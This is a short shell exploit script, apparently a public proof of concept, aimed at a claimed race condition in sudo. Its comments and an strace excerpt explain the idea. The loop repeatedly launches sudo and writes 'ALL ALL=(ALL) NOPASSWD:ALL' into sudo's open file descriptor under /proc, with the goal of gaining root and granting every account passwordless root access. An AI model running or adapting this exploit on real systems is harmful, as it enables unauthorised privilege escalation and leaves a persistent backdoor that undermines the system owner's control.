# oxagast / Marshall Whittaker
#
# The echo line uses sudoers file format to allow for everyone to
# use the root account and writes it to proc/23423/fd/3 (where
# the number is sudo's process.  If you have write access to file
# descriptor 3 it gives you root!
# Cavets: sudo must be running asking for a password at the time.
#         you must have write permission to 3.
#
# Race condition between when getting the uid of sudo and the
# setresuid and openat() syscall before being reset to 0 here.
#
# --- SNIP ---
# getresuid([0], [0], [0])                = 0
# getresgid([0], [0], [0])                = 0
# openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY) = 3
# fstat(3, {st_mode=S_IFREG|0644, st_size=556, ...}) = 0
# read(3, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 556
# read(3, "", 4096)                       = 0
# close(3)                                = 0
# setresuid(-1, 1, -1)                    = 0
# stat("/etc/sudoers", {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
# openat(AT_FDCWD, "/etc/sudoers", O_RDONLY) = 3
# fstat(3, {st_mode=S_IFREG|0440, st_size=39, ...}) = 0
# read(3, "root ALL=(ALL) ALL\n%sudo ALL=(AL"..., 4096) = 39
# lseek(3, 0, SEEK_SET)                   = 0
# fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
# setresuid(-1, 0, -1)                    = 0
# --- SNIP ---
sudo -V
while true; do
sudo su - &
echo "ALL ALL=(ALL) NOPASSWD:ALL" > /proc/`pgrep sudo`/fd/3;
pkill sudo;
done;